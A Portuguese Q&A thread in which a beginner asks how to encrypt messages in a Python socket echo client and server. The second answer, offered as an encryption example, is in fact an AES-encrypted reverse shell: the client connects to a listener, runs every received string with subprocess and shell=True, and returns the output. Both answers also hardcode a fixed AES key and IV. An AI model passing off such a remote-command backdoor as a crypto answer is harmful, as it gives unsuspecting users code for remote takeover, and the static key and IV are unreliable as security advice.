# Criptografar mensagem através de um socket em python

Tags: python-3.x, socket, criptografia, cliente-servidor

Eu estava dando uma olhada pela internet e achei um tutorial que mostrava como fazer uma comunicação de cliente e servidor através de um socket.

Esses são os scripts:

**Servidor**

```
#!/usr/bin/env python3

import socket

HOST = 'localhost'
PORT = 50000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen()
print('Aguardando conexão do cliente')
conn, ender = s.accept()

print('Conectado em', ender)
while True:
    data = conn.recv(1024)
    if not data:
        print('Fechando a conexão')
        conn.close()
        break
    conn.sendall(data)
```

**Cliente**

```
#!/usr/bin/env python3

import socket

HOST = '127.0.0.1'
PORT = 50000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(str.encode('Hello human!'))
data = s.recv(1024)

print('Mensagem ecoada:', data.decode())
```

Como eu faço para criptografar essa mensagem, caso exista alguma forma?

Ficaria grato se alguém respondesse.

Answer (score 1):

vc pode usar essas 2 fuinções para encodar e decodar a mensagem enviada

cliente:
from Crypto.Cipher import AES

```
def do_encrypt(message):
    obj = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')
    ciphertext = obj.encrypt(message)
    return ciphertext
```

servidor:

```
from Crypto.Cipher import AES

def do_decrypt(ciphertext):
    obj2 = AES.new('This is a key123', AES.MODE_CBC, 'This is an IV456')
    message = obj2.decrypt(ciphertext)
    return message
```

Comment: Blz, mas como eu integro isso no meu código? Desculpe, eu sou novo nessa parte de socket e tals

Comment: basta utilizar o do_encrypti na sua variavel data `do_encrypt(data)` e o do decript quando reveber ela no outro lado

Answer (score 0):

Simplificando, criptografa a mensagem envia do outro lado descriptografa a mensagem e criptografa a resposta.

```
A: envia mensagem cifrada a B
B: decrifa                                                                                           

A -**crypt**--> B
A <--**crypt**- B
```

**Código cliente**
Usando AES,  é uma cifra de bloco,  opera em blocos de tamanho fixo (128 bits, ou 16 bytes) de forma simétrica, usam a mesma chave para criptografar e descriptografar.

```
from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding
import socket
import subprocess
key = b"H" * 32  # chave secreta
IV = b"H" * 16 # 16 + 16 = 32 ,tamanho

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def cliente():
    s = socket.socket()
    s.connect(('192.168.0.1', 6666))
    while True:
        entrada = decrypt(s.recv(1024)) # descriptografar,1024 é a quantidade de carácter de retorno
        if 'sair' in entrada.decode():
             break
        else:
            CMD = subprocess.Popen(entrada.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
            s.send(encrypt(CMD.stdout.read())) #mensagem cifrada com segurança.
```

**Código Servidor**

```
import socket

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding

IV = b"H" * 16 # chave secreta
key = b"H" * 32 # tamanho

def encrypt(message):
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    padded_message = Padding.pad(message, 16)
    encrypted_message = encryptor.encrypt(padded_message)
    return encrypted_message

def decrypt(cipher):
    decryptor = AES.new(key, AES.MODE_CBC, IV)
    decrypted_padded_message = decryptor.decrypt(cipher)
    decrypted_message = Padding.unpad(decrypted_padded_message, 16)
    return decrypted_message

def connect():

    s = socket.socket()
    s.bind(('192.168.0.1', 6666))
    s.listen(1) 
    conn, address = s.accept()
    while True:

        entrada = input("shell: ")
        if 'sair' in entrada:
            conn.send(encrypt(b'sair'))
            conn.close()
            break
        else:
            entrada= encrypt(entrada.encode()) # protegida
            conn.send(entrada)# envia mensagem criptografada
            print(decrypt(conn.recv(1024)).decode())# mensagem cript
```